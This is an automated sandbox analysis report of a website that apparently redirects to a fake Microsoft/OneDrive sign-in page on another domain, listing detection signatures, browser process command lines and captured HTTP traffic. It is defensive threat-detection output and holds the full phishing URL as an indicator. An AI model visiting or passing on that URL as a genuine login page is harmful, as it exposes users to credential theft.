Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://samantacatering.com/

Overview

General Information

Sample URL:https://samantacatering.com/
Analysis ID:1587557
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML body contains low number of good links
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1980,i,699547893311511455,8046579587966195972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6516 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://samantacatering.com/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'umbrellabusses.com' does not match the legitimate domain for Microsoft., The domain 'umbrellabusses.com' does not have any apparent connection to Microsoft., The URL contains no direct reference to Microsoft, which is suspicious given the brand name., The presence of an input field for 'Enter email' on a non-Microsoft domain could be an attempt to phish for credentials. DOM: 4.6.pages.csv
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'umbrellabusses.com' does not match the legitimate domain for Microsoft., The domain name 'umbrellabusses.com' does not have any apparent connection to Microsoft., The presence of an input field for 'Enter email' on a non-Microsoft domain is suspicious and could be indicative of a phishing attempt., The URL does not contain any elements that suggest a legitimate association with Microsoft, such as 'microsoft' in the domain name. DOM: 4.3.pages.csv
Source: https://umbrellabusses.com/samhentir/HTTP Parser: Number of links: 0
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440HTTP Parser: Number of links: 0
Source: https://umbrellabusses.com/samhentir/HTTP Parser: Title: Sign in does not match URL
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440HTTP Parser: Title: One Drive - Login does not match URL
Source: https://umbrellabusses.com/samhentir/HTTP Parser: Invalid link: Privacy
Source: https://umbrellabusses.com/samhentir/HTTP Parser: Invalid link: Terms
Source: https://umbrellabusses.com/samhentir/HTTP Parser: Invalid link: Privacy
Source: https://umbrellabusses.com/samhentir/HTTP Parser: Invalid link: Terms
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440HTTP Parser: <input type="password" .../> found
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440HTTP Parser: No favicon
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440HTTP Parser: No favicon
Source: https://umbrellabusses.com/samhentir/HTTP Parser: No <meta name="author".. found
Source: https://umbrellabusses.com/samhentir/HTTP Parser: No <meta name="author".. found
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440HTTP Parser: No <meta name="author".. found
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440HTTP Parser: No <meta name="author".. found
Source: https://umbrellabusses.com/samhentir/HTTP Parser: No <meta name="copyright".. found
Source: https://umbrellabusses.com/samhentir/HTTP Parser: No <meta name="copyright".. found
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440HTTP Parser: No <meta name="copyright".. found
Source: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440HTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: samantacatering.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.samantacatering.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_api/v1/access-tokens HTTP/1.1Host: www.samantacatering.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ssr-caching=cache#desc=hit#varnish=hit_miss#dc#desc=fastly_virginia-pub_g
Source: global trafficHTTP traffic detected: GET /tag-bundler/api/v1/fonts-cache/googlefont/woff2/s/ebgaramond/v12/SlGUmQSNjdsmc35JDF1K5GR1SDk_YAPI.woff2 HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pages/pages/thunderbolt?beckyExperiments=.DatePickerPortal%2C.LoginBarEnableLoggingInStateInSSR%2C.TextInputAutoFillFix%2C.WRichTextVerticalTextNowidth%2C.WixFreeSiteBannerMobile%2C.buttonUdp%2C.fetchBlocksDevCenterWidgetIds%2C.fiveGridLineStudioSkins%2C.fixRatingsInputLeftShift%2C.imageEncodingAVIF%2C.inflateRepeaterItemsInRender%2C.minMaxInCheckboxGroup%2C.motionFeature%2C.prefetchPageResourcesVeloApi%2C.removeAllStatesBlocksFix%2C.removeHeaderFooterWrappers%2C.shouldUseResponsiveImages%2C.updateRichTextSemanticClassNamesOnCorvid%2C.useInternalBlocksRefType%2C.useSvgLoaderFeature&blocksBuilderManifestGeneratorVersion=1.129.0&contentType=application%2Fjson&deviceType=Desktop&dfCk=6&dfVersion=1.4246.0&disableStaticPagesUrlHierarchy=false&editorName=Unknown&experiments=dm_bgScrubToMotionFixer%2Cdm_deleteLayoutOverridesForRefComponents%2Cdm_removeTpaChildren%2Cspecs.thunderbolt.use_data_fixed_pages_upstream&externalBaseUrl=https%3A%2F%2Fwww.samantacatering.com&fileId=b5f4a1df.bundle.min&formFactor=desktop&hasTPAWorkerOnSite=false&isHttps=true&isInSeo=false&isMultilingualEnabled=false&isPremiumDomain=true&isTrackClicksAnalyticsEnabled=false&isUrlMigrated=true&isWixCodeOnPage=false&isWixCodeOnSite=false&language=en&languageResolutionMethod=QueryParam&metaSiteId=8fc1138c-79b4-4e29-bbc0-d551c6ca71af&module=thunderbolt-features&oneDocEnabled=true&originalLanguage=en&pageId=0158b4_e8786293acb663f652def8dbfaf20817_11.json&quickActionsMenuEnabled=false&registryLibrariesTopology=%5B%7B%22artifactId%22%3A%22editor-elements%22%2C%22namespace%22%3A%22wixui%22%2C%22url%22%3A%22https%3A%2F%2Fstatic.parastorage.com%2Fservices%2Feditor-elements%2F1.13190.0%22%7D%2C%7B%22artifactId%22%3A%22editor-elements%22%2C%22namespace%22%3A%22dsgnsys%22%2C%22url%22%3A%22https%3A%2F%2Fstatic.parastorage.com%2Fservices%2Feditor-elements%2F1.13190.0%22%7D%5D&remoteWidgetStructureBuilderVersion=1.251.0&siteId=cd5327d5-636b-4778-a97d-3945688a9fde&siteRevision=11&staticHTMLComponentUrl=https%3A%2F%2Fwww-samantacatering-com.filesusr.com%2F&useSandboxInHTMLComp=false&viewMode=desktop HTTP/1.1Host: siteassets.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/8875.46b20782.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag-bundler/api/v1/fonts-cache/googlefont/woff2/s/playfairdisplay/v18/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2 HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pages/pages/thunderbolt?beckyExperiments=.DatePickerPortal%2C.LoginBarEnableLoggingInStateInSSR%2C.TextInputAutoFillFix%2C.WRichTextVerticalTextNowidth%2C.WixFreeSiteBannerMobile%2C.buttonUdp%2C.fetchBlocksDevCenterWidgetIds%2C.fiveGridLineStudioSkins%2C.fixRatingsInputLeftShift%2C.imageEncodingAVIF%2C.inflateRepeaterItemsInRender%2C.minMaxInCheckboxGroup%2C.motionFeature%2C.prefetchPageResourcesVeloApi%2C.removeAllStatesBlocksFix%2C.removeHeaderFooterWrappers%2C.shouldUseResponsiveImages%2C.updateRichTextSemanticClassNamesOnCorvid%2C.useInternalBlocksRefType%2C.useSvgLoaderFeature&blocksBuilderManifestGeneratorVersion=1.129.0&contentType=application%2Fjson&deviceType=Desktop&dfCk=6&dfVersion=1.4246.0&disableStaticPagesUrlHierarchy=false&editorName=Unknown&experiments=dm_bgScrubToMotionFixer%2Cdm_deleteLayoutOverridesForRefComponents%2Cdm_removeTpaChildren%2Cspecs.thunderbolt.use_data_fixed_pages_upstream&externalBaseUrl=https%3A%2F%2Fwww.samantacatering.com&fileId=b5f4a1df.bundle.min&formFactor=desktop&hasTPAWorkerOnSite=false&isHttps=true&isInSeo=false&isMultilingualEnabled=false&isPremiumDomain=true&isTrackClicksAnalyticsEnabled=false&isUrlMigrated=true&isWixCodeOnPage=false&isWixCodeOnSite=false&language=en&languageResolutionMethod=QueryParam&metaSiteId=8fc1138c-79b4-4e29-bbc0-d551c6ca71af&module=thunderbolt-features&oneDocEnabled=true&originalLanguage=en&pageId=0158b4_c37f2e3e47614292406e9b0279f4140c_11.json&quickActionsMenuEnabled=false&registryLibrariesTopology=%5B%7B%22artifactId%22%3A%22editor-elements%22%2C%22namespace%22%3A%22wixui%22%2C%22url%22%3A%22https%3A%2F%2Fstatic.parastorage.com%2Fservices%2Feditor-elements%2F1.13190.0%22%7D%2C%7B%22artifactId%22%3A%22editor-elements%22%2C%22namespace%22%3A%22dsgnsys%22%2C%22url%22%3A%22https%3A%2F%2Fstatic.parastorage.com%2Fservices%2Feditor-elements%2F1.13190.0%22%7D%5D&remoteWidgetStructureBuilderVersion=1.251.0&siteId=cd5327d5-636b-4778-a97d-3945688a9fde&siteRevision=11&staticHTMLComponentUrl=https%3A%2F%2Fwww-samantacatering-com.filesusr.com%2F&useSandboxInHTMLComp=false&viewMode=desktop HTTP/1.1Host: siteassets.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/thunderbolt-commons.5848cc89.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/main.5209da57.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/main.renderer.a20626f8.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_api/v1/access-tokens HTTP/1.1Host: www.samantacatering.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ssr-caching=cache#desc=hit#varnish=hit_miss#dc#desc=fastly_virginia-pub_g; XSRF-TOKEN=1736517156|zNWYyaBL2sXn; hs=441353572; svSession=2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a472005d70c04e92b55797c1d6d99734f7952db21e644cd88b62a7ec3fed30c8eea5c1a3a42c574873a0b62283d958be7e075929b5797ae2c5
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/8875.46b20782.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /unpkg/lodash@4.17.21/lodash.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /unpkg/react@18.3.1/umd/react.production.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/main.renderer.a20626f8.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/browser-deprecation.bundle.es5.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/tag-manager-client/1.920.0/siteTags.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/thunderbolt-commons.5848cc89.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/main.5209da57.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /unpkg/lodash@4.17.21/lodash.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /unpkg/react-dom@18.3.1/umd/react-dom.production.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
